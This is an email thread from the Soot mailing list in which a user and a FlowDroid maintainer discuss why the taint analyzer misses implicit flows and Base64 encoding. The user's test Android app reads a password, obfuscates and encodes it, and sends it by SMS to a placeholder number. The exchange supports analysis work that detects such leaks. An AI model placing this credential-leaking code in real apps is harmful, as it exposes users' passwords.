
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=utf-8"><meta name=Generator content="Microsoft Word 14 (filtered medium)"><style><!--

/* Font Definitions */

@font-face

        {font-family:SimSun;

        panose-1:2 1 6 0 3 1 1 1 1 1;}

@font-face

        {font-family:SimSun;

        panose-1:2 1 6 0 3 1 1 1 1 1;}

@font-face

        {font-family:Calibri;

        panose-1:2 15 5 2 2 2 4 3 2 4;}

@font-face

        {font-family:Tahoma;

        panose-1:2 11 6 4 3 5 4 4 2 4;}

@font-face

        {font-family:"MS UI Gothic";

        panose-1:2 11 6 0 7 2 5 8 2 4;}

@font-face

        {font-family:"\@MS UI Gothic";

        panose-1:2 11 6 0 7 2 5 8 2 4;}

@font-face

        {font-family:"\@SimSun";

        panose-1:2 1 6 0 3 1 1 1 1 1;}

@font-face

        {font-family:DengXian;

        panose-1:3 0 5 9 0 0 0 0 0 0;}

@font-face

        {font-family:"\@DengXian";

        panose-1:3 0 5 9 0 0 0 0 0 0;}

/* Style Definitions */

p.MsoNormal, li.MsoNormal, div.MsoNormal

        {margin:0cm;

        margin-bottom:.0001pt;

        text-align:justify;

        font-size:10.5pt;

        font-family:DengXian;}

a:link, span.MsoHyperlink

        {mso-style-priority:99;

        color:blue;

        text-decoration:underline;}

a:visited, span.MsoHyperlinkFollowed

        {mso-style-priority:99;

        color:#954F72;

        text-decoration:underline;}

p

        {mso-style-priority:99;

        margin:0cm;

        margin-bottom:.0001pt;

        font-size:11.0pt;

        font-family:SimSun;}

p.MsoAcetate, li.MsoAcetate, div.MsoAcetate

        {mso-style-priority:99;

        mso-style-link:"Sprechblasentext Zchn";

        margin:0cm;

        margin-bottom:.0001pt;

        text-align:justify;

        font-size:8.0pt;

        font-family:"Tahoma","sans-serif";}

span.E-MailFormatvorlage18

        {mso-style-type:personal-reply;

        font-family:"Calibri","sans-serif";

        color:#1F497D;}

span.SprechblasentextZchn

        {mso-style-name:"Sprechblasentext Zchn";

        mso-style-priority:99;

        mso-style-link:Sprechblasentext;

        font-family:"Tahoma","sans-serif";}

.MsoChpDefault

        {mso-style-type:export-only;

        font-size:10.0pt;}

@page WordSection1

        {size:612.0pt 792.0pt;

        margin:72.0pt 90.0pt 72.0pt 90.0pt;}

div.WordSection1

        {page:WordSection1;}

--></style><!--[if gte mso 9]><xml>

<o:shapedefaults v:ext="edit" spidmax="1026" />

</xml><![endif]--><!--[if gte mso 9]><xml>

<o:shapelayout v:ext="edit">

<o:idmap v:ext="edit" data="1" />

</o:shapelayout></xml><![endif]--></head><body lang=DE link=blue vlink="#954F72" style='text-justify-trim:punctuation'><div class=WordSection1><p class=MsoNormal><span style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>Hi Young,<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>With implicit flow tracking enabled, FlowDroid should definitely be able to correctly track the taint through lines 1-4. Does it work when you remove line 5 from your test program? If so, you would just have to add the encodeToString() method to EasyTaintWrapperSource.txt to also include this last line in the taint analysis.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>Best regards,<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>  Steven<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p>&nbsp;</o:p></span></p><div><div style='border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal align=left style='text-align:left'><b><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'>Von:</span></b><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'> XiaoYang [mailto:yangx92@hotmail.com] <br><b>Gesendet:</b> Mittwoch, 9. Dezember 2015 04:54<br><b>An:</b> Steven Arzt; 'soot-list@CS.McGill.CA'<br><b>Betreff:</b> </span><span style='font-size:10.0pt;font-family:"MS UI Gothic","sans-serif"'>答复</span><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'>: [Soot-list] print the path from source(s) to sink(s) found by flowdroid<o:p></o:p></span></p></div></div><p class=MsoNormal align=left style='text-align:left'><o:p>&nbsp;</o:p></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>Hi Steven,</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>I have enabled implicit flow tracking, but flowdroid did not track code snippets below.</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for(char c : pwdString.toCharArray())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; obfPwd += c + &quot;_&quot;;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String message = &quot;User: &quot; +<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; user.getName() + &quot; | PWD: &quot; + obfPwd;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'>I want to obscure password string with line1, 2, 5. As you can see, flowdroid ignored for iteration and Base64 encode.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'>Thanks a lot.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'>Young<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><div style='border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><span lang=EN-US style='mso-fareast-language:ZH-CN'><br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>发件人</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>Steven Arzt<br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>发送时间</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>2015</span><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>年</span><span lang=EN-US style='mso-fareast-language:ZH-CN'>12</span><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>月</span><span lang=EN-US style='mso-fareast-language:ZH-CN'>8</span><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>日</span><span lang=EN-US style='mso-fareast-language:ZH-CN'> 22:21<br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>收件人</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>'XiaoYang';'soot-list@CS.McGill.CA'<br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>主题</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>AW: [Soot-list] print the path from source(s) to sink(s) found by flowdroid</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p></div><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:12.0pt;font-family:SimSun;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>Hi Young,</span><span style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>The second data flow that was missed is an implicit flow. There is no sequence of direct assignments between source and sink. Instead, the value that &nbsp;arrives at the sink is control-dependent on the value obtained from the source. By default, FlowDroid does not track such dependencies. If you need to, you can enable implicit flow tracking using the --implicit command-line option. This will, however, increase the runtime and memory consumption of your analysis.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>Additionally, for real-world apps, you will get a lot of additional flows as this definition of a data flow is very broad.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>Best regards,<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>&nbsp; Steven<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><div><div style='border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal align=left style='text-align:left'><b><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif";mso-fareast-language:ZH-CN'>Von:</span></b><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif";mso-fareast-language:ZH-CN'> XiaoYang [<a href="mailto:yangx92@hotmail.com">mailto:yangx92@hotmail.com</a>] <br><b>Gesendet:</b> Dienstag, 8. Dezember 2015 15:14<br><b>An:</b> Steven Arzt; 'soot-list@CS.McGill.CA'<br><b>Betreff:</b> </span><span lang=ZH-CN style='font-size:10.0pt;font-family:"MS UI Gothic","sans-serif";mso-fareast-language:ZH-CN'>答复</span><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif";mso-fareast-language:ZH-CN'>: [Soot-list] print the path from source(s) to sink(s) found by flowdroid<o:p></o:p></span></p></div></div><p class=MsoNormal align=left style='text-align:left'><span style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span lang=EN-US style='color:black;mso-fareast-language:ZH-CN'>Hi Steven,<o:p></o:p></span></b></p><p class=MsoNormal><span lang=EN-US style='color:black;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span lang=EN-US style='color:black;mso-fareast-language:ZH-CN'>I appended </span></b><b><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>“—pathalgo contextsensitive” to command line. It showed more information than before. However, it lost some information. <o:p></o:p></span></b></p><p class=MsoNormal><b><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>For example, below is the android application code snippets.<o:p></o:p></span></b></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; protected void onRestart(){<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; super.onRestart();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; EditText usernameText =<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (EditText)findViewById(R.id.username);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; EditText passwordText =<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (EditText)findViewById(R.id.pwdString);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String uname = usernameText.getText().toString();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;String pwd = passwordText.getText().toString();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(!uname.isEmpty() &amp;&amp; !pwd.isEmpty())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; this.user = new User(uname, pwd);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp; //Callback method defined in xml file<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp; public void sendMessage(View view) throws UnsupportedEncodingException{<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(user == null) return;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Password pwd = user.getpwd();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String pwdString = pwd.getPassword();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String obfPwd = &quot;&quot;;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //must track primitives<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for(char c : pwdString.toCharArray())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; obfPwd += c + &quot;_&quot;;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String message = &quot;User: &quot; +<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; user.getName() + &quot; | PWD: &quot; + obfPwd;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SmsManager sms = SmsManager.getDefault();<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sms.sendTextMessage(&quot;+86 12345678901&quot;,<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; null, message_base64, null, null); //pwd_str+uname_str<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp; }<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>I run the flowdroid with options</span></b><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>“</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>--pathalgo contextsensitive --implicit true -aplength 15</span></b><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>”</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>.<o:p></o:p></span></b></p><p><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>Following is the information given by flowdroid.<o:p></o:p></span></b></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>The sink virtualinvoke $r9.&lt;android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)&gt;(&quot;+86 12345678901&quot;, null, $r5, null, null) on line 49 in method &lt;com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)&gt; was called with values from the following sources:</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>- - $r1 = virtualinvoke $r0.&lt;com.example.leakpasswd.MainActivity: android.view.View findViewById(int)&gt;(2131230724) on line 26 in method &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>on Path:</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $r1 = virtualinvoke $r0.&lt;com.example.leakpasswd.MainActivity: android.view.View findViewById(int)&gt;(2131230724)</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $r3 = (android.widget.EditText) $r1</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $r4 = virtualinvoke $r3.&lt;android.widget.EditText: android.text.Editable getText()&gt;()</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $r6 = interfaceinvoke $r4.&lt;android.text.Editable: java.lang.String toString()&gt;()</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $z0 = virtualinvoke $r6.&lt;java.lang.String: boolean isEmpty()&gt;()</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; if $z0 != 0 goto return</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $r0.&lt;com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user&gt; = $r7</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void onRestart()&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; return</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;dummyMainClass: void dummyMainMethod(java.lang.String[])&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; virtualinvoke $r1.&lt;com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)&gt;($r3)</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; $r2 = $r0.&lt;com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; if $r2 != null goto $r2 = $r0.&lt;com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; &lt;com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>-&gt; virtualinvoke $r9.&lt;android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)&gt;(&quot;+86 12345678901&quot;, null, $r5, null, null)</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>The flowdroid did not track code below. <o:p></o:p></span></b></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for(char c : pwdString.toCharArray())<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US 